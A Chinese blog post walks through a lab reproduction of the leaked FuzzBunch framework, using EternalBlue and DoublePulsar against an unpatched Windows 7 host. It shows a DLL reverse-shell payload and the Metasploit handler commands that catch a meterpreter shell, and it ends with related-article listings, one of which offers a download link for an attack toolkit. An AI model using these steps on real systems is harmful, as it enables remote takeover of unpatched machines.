ShadowBroker攻击框架FuzzBunch实战之EternalBlue

最新推荐文章于 2024-06-01 10:03:01 发布
最新推荐文章于 2024-06-01 10:03:01 发布
阅读量6.2k 收藏 1
点赞数
分类专栏: security

环境准备:

IP地址 角色 操作系统 必需依赖 备注
192.168.119.164 靶机 Win7 SP1 64-bits \ 关闭防火墙,保证没有2017年微软系统补丁
192.168.119.153 攻击机(主) WinXP SP3 32-bits Python2.6.6和pywin32安装包 python 2.6别太老,否则没有Scripts目录安装pywin32模块
192.168.119.152 攻击机(辅助) kali1-amd64 \ 用来生成payload,这里主要是使用msf生成的dll后门

攻击方法:

在xp上用命令行进入fb.py所在的目录,运行fuzzbunch.

C:\Documents and Settings\Administrator>cd c:\TDDOWNLOAD\master\shadowbroker-mas
ter\windows\
C:\TDDOWNLOAD\master\shadowbroker-master\windows>python fb.py
 
 
  • 1
  • 2
  • 3

这里写图片描述

设置全局参数

  1. Default Target IP Address(默认靶机IP): 192.168.119.164
  2. Default Callback IP Address(默认监控主机IP): 192.168.119.152
  3. Use Redirection(使用重定向): no
  4. Set LogDir(设置日志路径): c:\logs\

这里写图片描述

使用EternalBlue攻击靶机,这里需要注意的是,事先要确定靶机的操作系统,这个类型要做选择。

另外就是攻击方式,需要选择FB

这里写图片描述

生成反弹shell用的dll文件

这里写图片描述

使用DoublePulsar攻击靶机 
这次要准备攻击负载,这里使用的是dll反弹shell。与EternalBlue一样,需要选择靶机系统类型。

切记, ProcessName [lsass.exe]者一项是默认,否则无法运行后门。

这里写图片描述

进入Kali,开启监听 
监听shell的主机要在反弹shell前启动才能收到反弹的shell。

use exploit/multi/
Display all 234 possibilities? (y or n)
msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST 192.168.119.152
LHOST => 192.168.119.152
msf exploit(handler) > set LPORT 8089
LPORT => 8089
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit 
 
 
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

这里写图片描述
攻击成功效果图

这里写图片描述

算法学习者
关注
专栏目录
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
fuzzbunch工具实现dll注入
Ms08067安全实验室
07-20 940
文章来源|MS08067内网安全知识星球本文作者:BlackCat(Ms08067 内网小组成员)前言上阶段无意间接触到了这个工具,感觉功能还可以,在最近的hw中,测试发现,在一些08的...
linux运行fuzzbunch,方程式0day ETERNALBLUE复现之Empire &ampamp; Msfconsole下的she...
weixin_29292431的博客
05-10 193
在本文中我将为大家复现在前段时间被曝出的,方程式0day Eternalblue利用过程。Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞。从涵盖的操作系统版本来看,Eternalblue针对的范围也非常广泛。从Windows XP到Windows Server 2012都为其攻击对象。而Windows 10和Windows Server 2016,...
Win7利用NSA Eternalblue 永恒之蓝fuzzbunch工具实现dll注入 Win 7 64CN
Zyecho的博客
01-24 3356
Win7利用NSA Eternalblue 永恒之蓝fuzzbunch工具实现dll注入 Win 7 64CN 一、原理 1.Eternalblue可以利用SMB漏洞,结合Doublepulsar后,获取Windows 7 系统权限 2.漏洞存在环境 几乎所有开放455端口的Win系统 3. SMB 一个网络文件共享协议 二、实验准备 攻击机:win7 64 IP:192.168.226.128 靶机:win7 64 CN IP: 192.168.226.129 辅助攻击机:kali IP : 192.
linux运行fuzzbunch,[原创]漏洞之永恒之蓝(简单复现)
weixin_39628070的博客
05-10 237
漏洞分析之永恒之蓝(ms17-010)目录☛ 1.漏洞介绍1.漏洞描述Eternalblue通过 TCP 端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows机器,无需用户任何操作,只要开机上网,就能在电脑中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序2.漏洞影响目前已知受影响的windows版本包括但不限于:Windows ...
shadowbroker
06-15
Shadowbroker 需要启动并运行“海外”socks5 代理,最简单的是使用 ssh: ssh user@remote -D 127.0.0.1:1081 -g -N 如果您不关心安全,请添加-c blowfish ,使用autossh来稳定连接。 然后运行影子经纪人: ./...
E+D:eternalblue+Doublepulsar
Amdy_amdy的博客
09-26 883
靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题) 攻击机:192.168.6.42 参考链接 http://www.duorenwei.com/news/5316.html https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8...
python工控开发框架_GitHub - hzglitter/isf: ISF(Industrial Security Framework),基于Python的工控漏洞利用框架...
weixin_34020067的博客
02-10 850
一、框架介绍本框架主要使用Python语言开发,通过集成ShadowBroker释放的NSA工具Fuzzbunch攻击框架,开发一款适合工控漏洞利用框架。由于Fuzzbunch攻击框架仅适用于Python2.6,很多核心的功能都封装成了DLL,通过函数进行调用,不便于后期的移植和使用。但是,Fuzzbunch的命令行使用的确很方便,而且够傻瓜,所以就有集成一个适合工控漏洞利用框架想法。新框架对...
Shadow broker IPC$.rar
12-31
Shadow broker安全测试渗透工具点击帽子即可进入使用软件 <<<<<>>>>>> 黑色命令输入框载入以下功能 >启动445pro生成窗口>>>>>>>>>>>>> 链接: https://pan.baidu.com/s/1JqTrBo4L0cYuTqamPFMSLA 提取码: 7rr1 启动ipC$渗透窗口启动命令Startcmd.exe Ptart135ipc$启动135ipc$渗透窗口 Dtart1433启动1433渗透文本 Etar445启动445渗透文本 Rtar135启动135渗透文本 GtarHOUMENFENGE启动分离 LtarWENJIANKUNBANGJIANCEFENLIQI文件捆绑检查分离器 HtarFANWENJIANKUNBANGGONGJU反文件捆绑器
Shadow Brokers 渗透工具.zip
01-01
Shadow Brokers 渗透工具
探秘NSA的暗影工具箱:Fuzzbunch深度解析与应用指南
最新发布
gitblog_00017的博客
06-01 424
探秘NSA的暗影工具箱:Fuzzbunch深度解析与应用指南 项目地址:https://gitcode.com/peterpt/fuzzbunch 项目介绍 在网络安全的深层领域,潜藏着一个源自美国国家安全局(NSA)的强大工具——Fuzzbunch。这个框架,正如其神秘背景一般,自Shadow Brokers泄露以来,一直是安全研究人员和黑客界热议的焦点。它是一个高度复杂的漏洞利用平台,集合了...
黑客工具包ShadowBrokers浅析
Qcloud_KID的博客
04-17 2573
臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers 在 steemit.com博客上提供了相关消息。 本次被公开的工具包大小为117.9MB,包含23 个黑客工具,其中部分文件显示 NSA 曾入侵中东 SWIFT 银行系统,工具包下载接见文后参考信息。 解密后的工具包: 其中 Windows 目录包括 Windows 利用工具和相关攻击代码,swift
FuzzBunch之payload—Regdelete复现(win7)
ckm1607011的博客
07-15 607
FuzzBunch资源:https://github.com/misterch0c/shadowbroker,从GitHub上下载下来解压为 我要复现的是windows的工具—windows文件夹下payloads子文件夹下的工具Regdelete exe作为插件,通过FuzzBunch框架调用运行,具体可以参见这篇博客:https://blog.csdn.net/yiyiiyiy/article/details/78627053 FuzzBunch框架配置好之后,按win+R快捷键,输入cmd进入命
打点-进入内网(一)
qq_44555676的博客
08-24 794
应用系统漏洞利用常见漏洞扫描1.Nmap扫描技巧2.impacket框架之mssql服务器安全检测mssglclient与其他工具相比的优势Mssqlclient的基本使用命令为Impacket网络协议工具包安装举例分析几种实际使用情况3.读入数据 常见漏洞扫描 1.Nmap扫描技巧 auth 处理身份验证 broadcast 网络广播 brute 暴力猜解 default 默认 discovery 服务发现 dos 拒绝服务 exploit 漏洞利用 external 外部扩展 fuzzer 模糊测
永恒之蓝(勒索病毒)复现与利用
qq_38348692的博客
08-08 3281
整个的复现的过程需要的环境以及工具有: kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174 winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141 win2007 :靶机,确保445端口开启。ip:192.168.15.144 永恒之蓝 python2.6已经在winsever下装python需...
利用NSA的MS17-010漏洞利用工具攻击Windows7
小晓晓晓林的博客
02-07 1811
0x01 Download NSA工具包 NSA工具包下载 攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境: python-2.6.6.msi、pywin32-221.win32-py2.6.exe 0x02 修改NSA工具配置文件 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件 注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, .
利用NSA方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)
热门推荐
weixin_38948797的博客
01-27 1万+
利用方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)  (注:本文章仅供技术交流和学习,请勿用于非法用途)     相信17年最大的安全事件比特币勒索病毒Wanncary没几个人不知道吧。那么究竟比特币勒索病毒究竟是怎么一回事呢?所谓比特币勒索病毒即:永恒之蓝漏洞利用程序+Wannacry勒索软件程序,也正是这两个武器造就了迄今为止最巨大的网络攻击勒索事件,影响到近百个国家上千家企业及
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值